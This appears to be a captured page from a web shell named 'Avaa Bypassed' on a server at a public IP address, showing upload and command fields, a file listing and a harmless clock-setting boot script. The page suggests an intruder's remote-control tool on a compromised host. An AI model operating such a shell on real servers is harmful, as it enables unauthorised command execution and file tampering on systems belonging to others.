404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@3.135.212.80: ~ $
#!/bin/sh

if test -e /etc/adjtime ; then
    while read line ; do
	if test "$line" = LOCAL ; then
	    hwclock --systz
	fi
    done < /etc/adjtime
fi

Filemanager

Name Type Size Permission Actions
module-setup.sh File 662 B 0644
warpclock.sh File 151 B 0644